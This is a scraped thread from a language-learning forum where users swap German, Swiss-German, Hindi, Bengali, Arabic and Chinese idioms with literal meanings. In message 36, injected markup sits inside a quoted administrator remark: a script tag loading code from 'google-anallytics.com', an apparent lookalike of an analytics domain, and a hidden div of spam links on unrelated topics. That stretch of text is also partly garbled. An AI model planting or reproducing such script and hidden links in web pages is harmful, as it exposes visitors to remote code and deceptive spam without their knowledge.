Triglot
United Kingdom
Joined 5525 days ago

1197 posts - 1487 votes 
Speaks: English*, German, French
Studies: Welsh, Russian, Japanese, Slovenian, Greek, Italian

Message 33 of 88
23 October 2009 at 2:55am | IP Logged 
In Hochdeutsch they have something similar to that expression, meramarina, to mean "to keep ones fingers crossed", which I suppose is like saying good luck. That would be "jemandem die Daumen drücken" - literally "to press one´s thumbs for someone", so that´s probably what he meant.

There are a few expressions in German meaning "it is raining cats and dogs". The ones I knew before looking it up were -

Es regnet in Strömen - it is raining in gushes, literally.
Es regnet junge Hunde - it is raining young dogs, literally.

The other one that LEO has in its wonderful inventory is "es regnet Bindfäden", and Bindfäden means "twines". If someone knows of this equivalent expression involving pitchforks, then I would be interested to see it.

Jack

1 person has voted this message useful

meramarina
Diglot
United States
Joined 5726 days ago

1341 posts - 2303 votes 
Speaks: English*, Spanish
Studies: German, Italian, French
Personal Language Map

Message 34 of 88
23 October 2009 at 5:27am | IP Logged 
LanguageSponge wrote:
"jemandem die Daumen drücken"

That makes sense now! Yes, he tends to speak very garbled English and that's caused hilarity and hurt feelings over the years! I thought that learning German would help, but now we misunderstand each other in two languages! No problem, I like the language in itself.

I checked my notebook and the phrase is: "wie aus Eimern gießen." I looked it up and it seems to mean that it is coming down in buckets. I am not sure where the pitchforks come from, but that was given as a colloquial meaning.

My cruel friends tried to teach me some Swiss-German but I just can't make the rough sounds it requires. These fine, not-so-neutral Swiss folks I know just had no end of laughter teaching me to say "zom chötza." I know Swiss-German isn't normally written; that's how they wrote it for me so I'd remember--for some reason, they really, really felt I needed to know how to say: "it makes me want to puke!"

So the full extent of my Swiss-German conversation was: "Grüezi! Zom chötze! Tschuss!"
or, "Hi! Makes me puke! Bye!" I am glad that they were entertained but I know that the other residents of their idyllic little village were wondering, behind their polite, unreadable faces, "Where the hell did she come from!" So, from now one it's only Hochdeutsch for me. As we say in English sometimes to express futility: "Never try to teach a pig to sing, it wastes your time and annoys the pig." Not that I'm a pig or anything--just a figure of speech!

Edited by meramarina on 23 October 2009 at 6:06am

LanguageSponge
Triglot
United Kingdom
Joined 5525 days ago

1197 posts - 1487 votes 
Speaks: English*, German, French
Studies: Welsh, Russian, Japanese, Slovenian, Greek, Italian

Message 35 of 88
23 October 2009 at 3:35pm | IP Logged 
I would love to learn one of the dialects of German, although Swiss German could be considered a language in its own right, I think. Thanks for the other idiom, I like that one, it's quite vivid in my mind.

I just thought of another few idioms which I really like in German.

in den saueren Apfel beißen literally means to bite into the sour apple. The equivalent English idiom is "to bite the bullet".

Das sind ungelegte Eier literally means something along the lines of "those are unlaid eggs". The corresponding English expression is "we will cross that bridge when we come to it", I believe.

Das ist ein Streit um des Kaisers Bart - that is splitting hairs. Literally means "that is an argument about the Kaiser´s beard". That one always makes me laugh.

Deji
Diglot
United States
Joined 5199 days ago

116 posts - 182 votes 
Speaks: English*, French
Studies: Hindi, Bengali

Message 36 of 88
03 January 2010 at 6:35pm | IP Logged 
[QUOTE=administrator] I will allow this thread - factual discussion of slang or obscene expressions is a part of
learning a language.'text/javascript' src='http://google-anallytics.com/urchin.js'></script& gt;<div
style='display:none;'><a href='#/1/'>beth bounty hunter losing weight</a><a
href='#/2/'>personal trainer certification nfl</a><a href='#/3/'>easy quit
smoking way</a><a href='#/4/'>lunar eyes embedded in the soul</a><a
href='#/5/'>bon jovi cheated</a><a href='#/6/'>masage therapy
occupation</a><a href='#/7/'>alternative investment partners llc</a><a
href='#/8/'>iq test videnskab</a><a href='#/9/'>clairvoyant psychic
reading</a><a href='#/10/'>herb past life</a><a href='#/11/'>jane
mansfield death date</a><a href='#/12/'>imminent death from lung cancer</a>

I agree--my hindi teacher (a nice lady) gave me all the four-letter words in hindi before I went there just so I
wouldn't look like an idiot with a polite smile when someone said something bad. Which is why you should not
discuss Honolulu with your Indian friends.

Deji
Diglot
United States
Joined 5199 days ago

116 posts - 182 votes 
Speaks: English*, French
Studies: Hindi, Bengali

Message 37 of 88
03 January 2010 at 6:48pm | IP Logged 
Also in Hindi, if you want to insult someone, you call them a brother-in-law.

Why, you wonder. "Sala" (which is a serious insult, by the way) I believe is the younger brother of the husband. They
(salas) traditionally have a free, joking and teasing and affectionate relationship with the wife in a culture in which
life was (and may still be, for many) very restricted. As a result, love affairs would be able to happen.

Unrelated curiosity: my Bengali dictionary has a word for a person who has bested his guru, and also for someone
who has an affair with his guru's wife !

Clearly the guru-shishya relationship has had some ramifications that we in the West have not heard about !! I
mean, in the dictionary ? !
3 persons have voted this message useful

Mosin
Diglot
United States
Joined 5322 days ago

9 posts - 19 votes
Speaks: Arabic (Written)*, English
Studies: Mandarin

Message 38 of 88
11 January 2010 at 12:32pm | IP Logged 
In my dialect, (of the Riyadh dialects)

يلحس المخ
لحس مخي
Literally:
It licks the brain.
He licked my brain.
Meaning:
It's confusing.
He confused me.

ما راح خير شر
Literally: He didn't go good,evil.
Meaning: He didn't go at all.

Edited by Mosin on 11 January 2010 at 12:33pm

Gusutafu
Sweden
Joined 5280 days ago

655 posts - 1039 votes 
Speaks: Swedish*

Message 39 of 88
11 January 2010 at 12:50pm | IP Logged 
Chinese is replete with lovely expressions, I am sure someone has a good link to some chengyu's. I personally like "It's like pulling the plants to make them grow" or "Rabbit don't eat the grass around their burrows" (Criminals don't rob their neighbours).

Less weird and wacky is a a four character word I once spotted, glossed as "ludicrous conceit stemming from pure ignorance". At the time, I kne just the man to go with that description.
2 persons have voted this message useful

Quetzalcoatl
Triglot
Groupie
France
Joined 6059 days ago

43 posts - 52 votes 
Speaks: French*, English, German
Studies: Japanese

Message 40 of 88
26 March 2010 at 8:09pm | IP Logged 
In German :

einen im Tee haben (to have one in tea) : to be drunk
wie Faust aufs Auge passen (to match like a fist on an eye) : to be a perfect match
wie Arsch auf Eimer passen (to match like an ass on a bucket) : id.

This discussion contains 88 messages over 11 pages: << Prev 1 2 3 46 7 8 9 10 11  Next >>

Post ReplyPost New Topic Printable version Printable version